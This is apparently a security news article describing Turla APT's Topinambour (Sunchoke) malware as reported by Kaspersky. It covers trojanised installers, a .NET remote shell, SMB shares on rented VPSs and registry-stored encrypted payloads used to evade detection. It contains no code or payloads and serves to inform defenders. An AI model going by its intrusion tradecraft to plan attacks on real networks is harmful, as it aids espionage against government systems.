Infamous Turla APT Hackers group renew its arsenal with a new hacking tool named “Topinambour ” also called as aka Sunchoke that is mainly used to target and compromise the government networks.
The newly added tool started using at the beginning of 2019, and the malware authors named it as Tonpinambour by themselves for this renewed hacking tool.
Turla APT group also known as Venomous Bear or Waterbug which is actively attacking various government network since 2004 especially in the Middle East, Central and Far East Asia, Europe, North and South America.
Turla is also responsible for some of the high-profile breaches including United States Central Command in 2008, Swiss military company RUAG in 2014, French Armed Forces in 2018 and the APT has actively attacked more than a decade.
Threat actors randomly using various strings within this .NET module including “TrumpTower”, “RocketMan, “MiamiBeach” and is used as an initial message from compromised victims to control server, compromised WordPress websites where threat actor injected the .php scripts.
Topinambour Infection Process
The initial stage of an attack, threat actors using legitimate software installer that already infected by Topinambour dropper, which is one of the effective methods to bypass the internet censorship.
This dropper holding the .NET shell that will wait for Windows shell commands from threat actors. Using this .NET shell and rented SMB shares on virtual private servers (VPS), threat actors launch the next stage of malware using Windows shell commands such as “net use” and “copy”.
In this case, researchers stated that “It’s hard to believe, but SMB still works through public networks.” and the campaign-related VPSs are located in South Africa.
Threat actors creatively using a “make_some_noise()”, a remote shell persistence function to avoid detection from security detection software.
Tiny .NET shell receives the Windows shell commands from the Command & Control server and silently execute them.
“The downloaded script takes a binary from the Windows registry and runs it. The registry subkeys and values vary from target to target.”
“Using the Windows system registry to store encrypted data that is later used by the malware also seems to be aimed at minimizing detection and reducing the digital footprint on any victim’s computer,” Kaspersky reported.
Indicators of compromise
Some campaign-related MD5 hashes
Domains and IP’s – VPSs used as control servers